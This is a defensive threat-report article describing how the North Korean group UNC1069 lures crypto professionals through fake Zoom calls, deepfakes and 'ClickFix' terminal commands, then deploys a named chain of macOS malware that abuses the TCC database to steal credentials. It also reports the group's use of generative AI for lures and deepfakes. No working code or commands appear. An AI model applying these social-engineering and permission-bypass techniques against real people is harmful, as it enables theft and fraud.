Imagine you are a successful developer or a venture capitalist working in the fast-paced world of cryptocurrency, and a famous startup founder reaches out to you on Telegram for a quick meeting. It sounds like a great opportunity, but within minutes of joining a simple video call, your digital wallet is empty and your sensitive data is gone. This is the reality of the latest campaigns by a North Korean threat actor known as UNC1069, a group that is becoming increasingly dangerous by blending traditional social engineering with advanced artificial intelligence.
The threat actor UNC1069, which is also tracked by cybersecurity professionals under the names CryptoCore and MASAN, has been active since at least April 2018. While they originally focused on traditional financial institutions, they have recently shifted their focus entirely toward the Web3 industry, including centralized exchanges, venture capital funds, and high-tech software developers. This group is not just looking for a quick win; they are highly patient and use sophisticated tools to build trust with their victims before launching an attack. By using compromised Telegram accounts of legitimate entrepreneurs, they create an illusion of authenticity that is very difficult for even tech-savvy individuals to detect.
The attack sequence typically begins with a direct message on Telegram. The hackers impersonate reputable investors or founders and suggest a 30-minute meeting to discuss a potential partnership or investment. To make the process look professional, they use Calendly links to schedule the call, but these links eventually redirect the victim to a fake website that mimics the official Zoom interface. In some instances, the attackers use the hyperlink feature in Telegram to hide malicious URLs, making a dangerous link look like a standard “zoom.us” address. This initial stage of the attack is crucial because it relies on the victim’s psychological tendency to trust a scheduled business appointment.
Once the victim clicks the link, they are taken to a fake video call interface that looks identical to the real Zoom application. The website asks the user to enable their camera and enter their name to join the session. When the target joins, they are greeted with video footage of what appears to be a live person on the other end. Research from Google Mandiant and Kaspersky suggests that these videos are often deepfakes created using generative AI or actual recordings stolen from previous victims. In a clever move, once a recording finishes playing, the interface smoothly transitions to the person’s profile image, maintaining the illusion that the call is still active but the other person has simply turned off their camera.
The technical complexity increases significantly during the next phase, which utilizes a technique known as ClickFix. The victim is shown a fake error message claiming there is an issue with their computer’s audio or video settings. To “fix” the problem, the site instructs the user to copy and run a specific command in their system terminal or PowerShell. For macOS users, this command triggers an AppleScript that downloads and executes a malicious Mach-O binary called WAVESHAPER. This C++ executable is the first step in a long chain of malware designed to take full control of the host system. Once WAVESHAPER is running, it gathers basic system information and brings in a Go-based downloader known as HYPERCALL.
Following the initial infection, the attackers deploy a variety of secondary payloads to ensure they can steal as much data as possible. One of the primary components is HIDDENCALL, a Golang backdoor that gives the hackers hands-on keyboard access to the infected computer. Working alongside this is DEEPBREATH, a Swift-based data miner specifically built for macOS. DEEPBREATH is particularly dangerous because it attempts to manipulate the Transparency, Consent, and Control (TCC) database on the Mac. By doing this, the malware gains permission to access sensitive files without the user ever seeing a permission prompt. This allows the group to steal iCloud Keychain credentials, browser data from Chrome and Brave, and even private notes from the Apple Notes application.
The group also utilizes another downloader called SUGARLOADER, which is responsible for installing a browser extension named CHROMEPUSH. This extension is a highly effective data stealer written in C++ that masquerades as a legitimate tool for editing Google Docs offline. Once installed in Google Chrome or Brave, it records every keystroke the user types, captures usernames and passwords, and extracts browser cookies that can be used to bypass two-factor authentication. To round out their toolkit, UNC1069 often deploys a minimalist backdoor called SILENCELIFT, which acts as a persistent connection to their command-and-control server, allowing them to monitor the victim for long periods.
The sheer volume of unique malware families deployed on a single computer highlights how determined this North Korean group is to facilitate financial theft. They are no longer just using simple phishing emails; they are leveraging advanced AI tools like Gemini to create convincing lure materials and deepfake technology to bypass the human element of security. This evolution in tactics shows that the cryptocurrency sector remains a high-priority target for state-sponsored actors who are looking for ways to bypass international sanctions and fund their operations. The combination of social engineering, deceptive AI, and a multi-layered malware chain makes UNC1069 one of the most sophisticated threats facing the Web3 community today.
Understanding these threats is the first step in staying safe in a digital world where seeing is no longer believing. It is vital to remember that legitimate software companies like Zoom will never ask you to run manual terminal commands or AppleScripts to fix a common audio issue. You should always verify the identity of the person you are meeting with through a secondary communication channel before clicking any links. If you are ever prompted to download a “troubleshooting” tool or run a command from a website, you should immediately close the tab and report the incident to your security team. Staying skeptical of unsolicited messages and maintaining strict control over your system permissions is the best way to protect your digital assets from these advanced persistent threats.
Ref: